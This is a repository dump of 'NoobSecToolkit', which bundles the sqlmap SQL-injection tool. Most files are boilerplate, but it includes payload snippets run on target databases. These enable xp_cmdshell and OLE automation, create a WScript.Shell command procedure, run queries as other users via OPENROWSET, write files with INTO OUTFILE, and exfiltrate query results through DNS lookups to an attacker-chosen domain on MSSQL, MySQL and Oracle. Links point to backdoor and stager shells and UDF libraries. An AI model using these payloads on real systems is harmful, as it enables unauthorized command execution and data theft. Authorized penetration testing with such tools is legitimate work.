#!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/techniques/blind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/techniques/brute/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/techniques/dns/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/techniques/error/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/techniques/union/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/plugins/dbms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/plugins/dbms/db2/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem 9 | 10 | class Filesystem(GenericFilesystem): 11 | def __init__(self): 12 | GenericFilesystem.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/plugins/dbms/db2/takeover.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.takeover import Takeover as GenericTakeover 9 | 10 | class Takeover(GenericTakeover): 11 | def __init__(self): 12 | self.__basedir = None 13 | self.__datadir = None 14 | 15 | GenericTakeover.__init__(self) 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/plugins/dbms/mysql/enumeration.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration 9 | 10 | class Enumeration(GenericEnumeration): 11 | def __init__(self): 12 | GenericEnumeration.__init__(self) 13 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/plugins/generic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder represent SQL snippets used by sqlmap on the target 2 | system. 3 | They are licensed under the terms of the GNU Lesser General Public License 4 | where not specified otherwise. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/activate_sp_oacreate.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'ole automation procedures',1; 4 | RECONFIGURE WITH OVERRIDE 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/configure_openrowset.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options', 1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options', 0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/configure_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_configure 'show advanced options',1; 2 | RECONFIGURE WITH OVERRIDE; 3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%; 4 | RECONFIGURE WITH OVERRIDE; 5 | EXEC sp_configure 'show advanced options',0; 6 | RECONFIGURE WITH OVERRIDE 7 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/create_new_xp_cmdshell.sql: -------------------------------------------------------------------------------- 1 | DECLARE @%RANDSTR% nvarchar(999); 2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; 3 | EXEC master..sp_executesql @%RANDSTR% 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/disable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_dropextendedproc 'xp_cmdshell' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/dns_request.sql: -------------------------------------------------------------------------------- 1 | DECLARE @host varchar(1024); 2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%'; 3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"') 4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"') 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/enable_xp_cmdshell_2000.sql: -------------------------------------------------------------------------------- 1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll' 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mssqlserver/run_statement_as_user.sql: -------------------------------------------------------------------------------- 1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 2 | # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%') 3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%') 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mysql/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%')) 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/mysql/write_file_limit.sql: -------------------------------------------------------------------------------- 1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- 2 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/procs/oracle/dns_request.sql: -------------------------------------------------------------------------------- 1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL 3 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/backdoor.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/backdoor.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/backdoor.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/backdoor.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/backdoor.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/backdoor.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/backdoor.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/backdoor.php_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/runcmd.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/runcmd.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/stager.asp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/stager.asp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/stager.aspx_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/stager.aspx_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/stager.jsp_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/stager.jsp_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/shell/stager.php_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/shell/stager.php_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/ansistrm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/ansistrm/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/bottle/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/colorama/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/colorama/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/magic/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/magic/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/multipart/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/multipart/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/oset/__init__.py: -------------------------------------------------------------------------------- 1 | """Main Ordered Set module """ 2 | 3 | from pyoset import oset 4 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/socks/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/socks/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/thirdparty/termcolor/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/thirdparty/termcolor/__init__.py -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/txt/wordlist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/txt/wordlist.zip -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/README.txt: -------------------------------------------------------------------------------- 1 | Binary files in this folder are data files used by sqlmap on the target 2 | system, but not executed on the system running sqlmap. They are licensed 3 | under the terms of the GNU Lesser General Public License and their source 4 | code is available on https://github.com/sqlmapproject/udfhack. 5 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/mysql/linux/32/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/mysql/linux/32/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/mysql/linux/64/lib_mysqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/mysql/linux/64/lib_mysqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/mysql/windows/32/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/mysql/windows/64/lib_mysqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/inject/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/waf/proventia.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "Proventia Web Application Security (IBM)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if page is None: 13 | return False 14 | page, headers, code = get_page(url="/Admin_Files/") 15 | return page is None 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/waf/webappsecure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | __product__ = "webApp.secure (webScurity)" 9 | 10 | def detect(get_page): 11 | page, headers, code = get_page() 12 | if code == 403: 13 | return False 14 | page, headers, code = get_page(get="nx=@@") 15 | return code == 403 16 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/xml/banner/oracle.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/xml/banner/sharepoint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/inject/xml/banner/x-aspnet-version.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/.gitattributes: -------------------------------------------------------------------------------- 1 | *.py text eol=lf 2 | *.conf text eol=lf 3 | 4 | *_ binary 5 | *.dll binary 6 | *.pdf binary 7 | *.so binary 8 | *.wav binary 9 | *.zip binary 10 | *.x32 binary 11 | *.x64 binary 12 | *.exe binary 13 | *.sln binary 14 | *.vcproj binary 15 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/.gitignore: -------------------------------------------------------------------------------- 1 | *.py[cod] 2 | output/ 3 | .sqlmap_history 4 | traffic.txt 5 | *~ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/doc/AUTHORS: -------------------------------------------------------------------------------- 1 | Bernardo Damele Assumpcao Guimaraes (@inquisb) 2 | 3 | 4 | Miroslav Stampar (@stamparm) 5 | 6 | 7 | You can contact both developers by writing to dev@sqlmap.org 8 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/doc/FAQ.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/doc/FAQ.pdf -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/doc/README.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/doc/README.pdf -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/beep/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/beep/beep.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/extra/beep/beep.wav -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/cloak/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/dbgtool/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 5 | See the file 'doc/COPYING' for copying permission 6 | """ 7 | 8 | pass 9 | -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/icmpsh/icmpsh.exe_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krintoxi/NoobSec-Toolkit/630cd96eb1b6bf850cfb459500cc39410e08be51/NoobSecToolkit /tools/sqli/extra/icmpsh/icmpsh.exe_ -------------------------------------------------------------------------------- /NoobSecToolkit /tools/sqli/extra/runcmd/README.txt: -------------------------------------------------------------------------------- 1 | Files in this folder can be used to compile auxiliary program that can 2 | be used for running command prompt commands skipping standard "cmd /c" way. 3 | They are licensed under the terms of the GNU Lesser General Public License. 4 | -------------------------------------------------------------------------------- /NoobSecToolkit 